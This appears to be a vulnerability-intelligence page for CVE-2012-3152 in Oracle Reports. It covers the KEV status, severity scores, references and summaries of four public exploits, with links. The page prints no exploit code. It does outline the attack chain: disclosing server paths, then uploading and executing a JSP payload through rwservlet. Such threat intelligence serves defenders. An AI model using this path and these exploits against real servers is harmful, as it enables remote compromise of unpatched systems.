CVE-2012-3152

CRITICAL KEV

Oracle Reports Developer - Info Disclosure

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2012-3152 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added November 3, 2021. EIP tracks 4 public exploits from researchers including Metasploit, Mekanismen, abq0, including a Metasploit module exploits/multi/http/oracle_reports_rce.

AI-analyzed exploit summary This Metasploit module exploits CVE-2012-3152 and CVE-2012-3153 in Oracle Forms and Reports to achieve remote code execution by leveraging path disclosure and arbitrary file write vulnerabilities. It uploads a JSP payload to the target system and executes it.

Description

Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.

Exploits (4)

exploitdb WORKING POC VERIFIED
by Metasploit · rubyremotewindows
https://www.exploit-db.com/exploits/31737

This Metasploit module exploits CVE-2012-3152 and CVE-2012-3153 in Oracle Forms and Reports to achieve remote code execution by leveraging path disclosure and arbitrary file write vulnerabilities. It uploads a JSP payload to the target system and executes it.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle Forms and Reports 10.1
No auth needed
Prerequisites: Network access to the target Oracle Forms and Reports server · Target server must be vulnerable to CVE-2012-3152 and CVE-2012-3153
devstral-2 · analyzed Feb 16, 2026 Full analysis →
exploitdb WORKING POC
by Mekanismen · rubyremotejsp
https://www.exploit-db.com/exploits/31253

This Ruby script automates the exploitation of CVE-2012-3152 and CVE-2012-3153 in Oracle Reports 11.1 by uploading a malicious JSP payload to a vulnerable server. It enumerates keymaps, extracts server credentials, and leverages the 'showenv' endpoint to determine the local path for payload deployment.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle Reports 11.1
No auth needed
Prerequisites: Access to the target Oracle Reports server · A hosted JSP payload URL
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec SCANNER 2 stars
by abq0 · poc
https://github.com/abq0/rwsploit

This repository contains a Python-based scanner for detecting and testing vulnerabilities in Oracle Reports Server (rwservlet) related to CVE-2012-3152 and CVE-2012-3153. It includes functionality for LFI (Local File Inclusion), SSRF (Server-Side Request Forgery), and shell upload testing, but does not contain a full exploit PoC for achieving remote code execution.

Classification
Scanner 95%
Attack Type
Info Leak | Ssrf
Complexity
Moderate
Reliability
Reliable
Target: Oracle Reports Server (rwservlet) < v11
No auth needed
Prerequisites: Network access to the target Oracle Reports Server · Python 3.8+ environment
devstral-2 · analyzed May 19, 2026 Full analysis →
metasploit WORKING POC GREAT
rubypoclinux
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/oracle_reports_rce.rb

This Metasploit module exploits CVE-2012-3152 and CVE-2012-3153 in Oracle Forms and Reports to achieve remote code execution by leveraging path traversal and arbitrary file write vulnerabilities. It first discloses server paths via the 'showenv' endpoint, then uploads a malicious JSP payload to a writable directory, and executes it.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle Forms and Reports 10.1
No auth needed
Prerequisites: Network access to the Oracle Reports server · The target must have Oracle Forms and Reports 10.1 installed
devstral-2 · analyzed Apr 30, 2026 Full analysis →

References (12)

Core 12
Core References
Exploit, Third Party Advisory, VDB Entry exploit x_refsource_exploit-db
http://www.exploit-db.com/exploits/31253
Broken Link vdb-entry x_refsource_osvdb
http://www.osvdb.org/86394
Broken Link, Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/55955
Broken Link vdb-entry x_refsource_osvdb
http://www.osvdb.org/86395
Mailing List, Third Party Advisory mailing-list x_refsource_fulldisc
http://seclists.org/fulldisclosure/2014/Jan/186
Third Party Advisory, VDB Entry vdb-entry x_refsource_xf
https://exchange.xforce.ibmcloud.com/vulnerabilities/79295
Broken Link vendor-advisory x_refsource_mandriva
http://www.mandriva.com/security/advisories?name=MDVSA-2013:150

Scores

CVSS v3 9.1
EPSS 0.9354
EPSS Percentile 99.8%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CISA SSVC

Vulnrichment
Exploitation active
Automatable yes
Technical Impact total

Details

CISA KEV 2021-11-03
VulnCheck KEV 2021-01-01
InTheWild.io 2021-07-23
ENISA EUVD EUVD-2012-3130
Status published
Products (3)
oracle/fusion_middleware 11.1.1.4.0
oracle/fusion_middleware 11.1.1.6.0
oracle/fusion_middleware 11.1.2.0
Published Oct 16, 2012
KEV Added Nov 03, 2021
Tracked Since Feb 18, 2026